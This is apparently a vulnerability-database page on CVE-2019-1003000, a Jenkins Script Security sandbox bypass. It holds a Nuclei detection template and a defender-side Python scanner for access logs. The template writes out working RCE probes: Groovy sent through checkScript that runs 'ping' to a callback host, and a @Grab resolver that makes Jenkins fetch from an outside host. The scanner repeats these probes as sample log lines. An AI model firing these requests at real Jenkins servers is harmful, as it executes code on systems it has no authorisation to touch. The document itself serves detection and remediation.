| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2019-1003000 | 24 Apr 2019 23:52 | – | githubexploit |
| Exploit for CVE-2019-1003000 | 15 Feb 2019 05:59 | – | githubexploit |
| Exploit for OS Command Injection in Pfsense | 26 Apr 2017 02:03 | – | githubexploit |
| Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution Exploit | 25 Feb 2019 00:00 | – | zdt |
| Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE Exploit | 19 Mar 2019 00:00 | – | zdt |
| Exploit for CVE-2019-1003000 | 18 Jul 2020 23:27 | – | gitee |
| Exploit for CVE-2019-1003000 | 31 Mar 2021 11:15 | – | gitee |
| Exploit for CVE-2019-1003000 | 7 Feb 2021 15:45 | – | gitee |
| Exploit for CVE-2019-1003000 | 19 Jan 2020 17:01 | – | gitee |
| jenkins -- multiple vulnerabilities | 18 Jul 2018 00:00 | – | freebsd |
```yaml
id: CVE-2019-1003000

info:
  name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
  author: sttlr
  severity: high
  description: |
    A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
  impact: |
    Attackers with permission to submit sandboxed scripts can bypass sandbox protections and execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment and all managed systems.
  remediation: |
    Upgrade to Jenkins Script Security Plugin version 1.50 or later.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-1003000
    epss-score: 0.98428
    epss-percentile: 0.99912
    cpe: cpe:2.3:a:jenkins:script_security:*:*:*:*:*:jenkins:*:*
  reference:
    - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
    - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
    - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
    - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
    - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
    - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  metadata:
    verified: true
    max-request: 6
    vendor: jenkins
    product: script_security
  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated,vkev,vuln

variables:
  username: admin
  vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
  app_name: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && (http(3) || http(4))

http:
  # http(1): confirm the target is a Jenkins instance
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "jenkins"
        internal: true
        case-insensitive: true

  # http(2): authenticate with the supplied credentials and confirm a logged-in session
  - raw:
      - |
        POST /j_acegi_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(tolower(body_2), "jenkins", "/logout")'
        internal: true

  # http(3): sandboxed checkScript with a DNS callback (Linux and Windows ping variants)
  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

  # http(4): checkScriptCompile with a @Grab resolver pointing at the interactsh host
  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
# digest: 490a0046304402207e6c4868cadc010f9886c3658d32881a4ca2093fc3a5615d64d7affcd07640e102207d5e234baf64039c939dae07a4359206b32aa1e45cddedea1242450e037e94f2:922c64590222798bb761d5b6d8e72950
```
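The template above exercises two Jenkins form-validation endpoints (`SecureGroovyScript/checkScript` with `sandbox=true` and `CpsFlowDefinition/checkScriptCompile` with `@Grab` annotations). The following is an added, defender-side example, not part of the Vulners record or the Nuclei template: it scans web-server access logs in front of a Jenkins instance for requests that match those two probe shapes, so that scanner activity or exploitation attempts against SECURITY-1266 surface in monitoring. It assumes the combined log format; the sample log lines, the `example.oast.test` callback host, the IPs and the timestamps are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint suffixes taken from the template's http(3) and http(4) requests.
CHECK_SCRIPT = ("/descriptorByName/org.jenkinsci.plugins.scriptsecurity."
                "sandbox.groovy.SecureGroovyScript/checkScript")
CHECK_COMPILE = ("/descriptorByName/org.jenkinsci.plugins.workflow.cps."
                 "CpsFlowDefinition/checkScriptCompile")

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not from the page): two benign requests and two
# that mirror the template's probes with a placeholder callback host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login HTTP/1.1" 200 1532
10.0.0.5 - admin [01/Jan/2024:10:00:02 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20abcdefgh{public%20abcdefgh(){%22ping%20-c%202%20example.oast.test%22.execute()}} HTTP/1.1" 200 0
10.0.0.5 - admin [01/Jan/2024:10:00:03 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2fexample.oast.test%2f%27)%0a@Grab(%27abc.defgh:abcdefgh:1%27)%0aimport%20abcdefgh; HTTP/1.1" 200 0
10.0.0.7 - bob [01/Jan/2024:10:01:00 +0000] "GET /job/build/1/console HTTP/1.1" 200 4411
"""


def query_params(query):
    """Split a raw query string on '&' only, keeping the first value per key.

    Hand-rolled instead of parse_qs because the probe's Groovy payload can
    contain ';', which older Python versions treat as a separator.
    """
    params = {}
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(val))
    return params


def classify_request(target):
    """Return a finding label for one request target, or None if it is not suspicious."""
    parts = urlsplit(target)
    path = unquote_plus(parts.path)
    params = query_params(parts.query)
    value = params.get("value", "")
    if path.endswith(CHECK_SCRIPT):
        sandboxed = params.get("sandbox", "").lower() == "true"
        # Sandboxed validation should never need to spawn a process.
        if sandboxed and ".execute(" in value:
            return "sandboxed checkScript with process execution (SECURITY-1266 pattern)"
    if path.endswith(CHECK_COMPILE) and "@Grab" in value:
        # Compile-only validation pulling a dependency from an arbitrary resolver.
        return "checkScriptCompile with @Grab dependency fetch (SECURITY-1266 pattern)"
    return None


def scan_log(text):
    """Return (ip, user, label) for each log line whose request matches a probe pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m.group("target"))
        if label:
            findings.append((m.group("ip"), m.group("user"), label))
    return findings


if __name__ == "__main__":
    for ip, user, label in scan_log(SAMPLE_LOG):
        print(f"{ip} ({user}): {label}")
```

Both hits come from the same authenticated user, which matches the template's `authenticated` tag: the matched request paths include the acting user's name under `/securityRealm/user/`, so a finding also tells you whose credentials were used. Pair this with the remediation in the template (Script Security 1.50 or later) rather than relying on log review alone.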